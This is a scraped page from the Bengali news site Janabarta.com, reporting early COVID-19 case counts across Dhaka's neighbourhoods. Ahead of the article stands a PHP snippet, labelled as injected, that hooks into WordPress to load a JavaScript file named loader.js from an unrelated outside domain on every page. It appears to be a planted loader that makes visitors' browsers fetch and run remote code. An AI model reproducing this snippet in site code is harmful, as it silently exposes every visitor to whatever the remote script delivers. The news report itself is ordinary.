// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site করোনা: ঢাকার সর্বোচ্চ আক্রান্ত উত্তরায়, তারপর ধানমণ্ডি - Janabarta.com

করোনা: ঢাকার সর্বোচ্চ আক্রান্ত উত্তরায়, তারপর ধানমণ্ডি

জনবার্তা ডেস্কঃ করোনাভাইরাসে দেশে মোট আক্রান্তের সংখ্যা ৩৩০ জন। শুধু ঢাকা বিভাগে এই সংখ্যাটা ১৯৬। এর মধ্যে নারায়ণগঞ্জে ৫৯ জন, মাদারীপুরে ১১, নরসিংদীতে ৪, জামালপুর ও মানিকগঞ্জে ৩ জন করে, গাজীপুর-টাঙ্গাইল ও শেরপুরে ২ জন করে, রাজবাড়ী-শরিয়তপুর ও কিশোরগঞ্জে ১ জন করে। বাকি সব ঢাকা শহরে।

ঢাকার ভেতরে করোনায় আক্রান্তের দিক থেকে সবচেয়ে এগিয়ে আছে উত্তরা, ১৬ জন। তারপরই ধানমণ্ডির অবস্থান, ১৩ জন। এরপর যথাক্রমে মিরপুর-১-এ ১১ জন, পুরান ঢাকার ওয়ারিতে ১০ জন। ৮ জন করে আছেন টোলারবাগ, লালবাগ ও মোহাম্মদপুরে। ৬ জন করে আছেন মিরপুর-১১, উত্তর টোলারবাগ, গুলশান ও যাত্রাবাড়ীতে।

আজিমপুর, বংশালে আছেন ৪ জন করে। মিরপুর-১০, জিগাতলা, হাজারীবাগ, গ্রিণরোড, চকবাজার, বাবু বাজার, বেইলি রোড, সোয়ারি ঘাটে ৩ জন করে। দুইজন করে আছেন শাহবাগ, আগারগাঁও, হাতিরপুল, ইসলামপুর, লক্ষ্মীবাজার, পুরানা পল্টন, শান্তিনগর, মগবাজার, বাড্ডা, মহাখালী, তেজগাঁও, মিরপুর-১২, শাহ আলী বাগ ও পীরের বাগে।

একজন করে আছেন আদাবর, বসিলা, সেন্ট্রাল রোড, বুয়েট এলাকা, উর্দুরোড, নারিন্দা, দয়াগঞ্জ, ধোলাইখাল, মানিকদি, আশকোনা, কোতোয়ালী, শনির আখড়া, মুগদা, রাজারবাগ, ইস্কাটন, রামপুরা, মিরপুর-১৩, হাতিরঝিল, শাহজাহানপুর, নিকুঞ্জ, বেড়িবাঁধ, বনানী, বেগুনবাড়ি, কাজীপাড়ায়।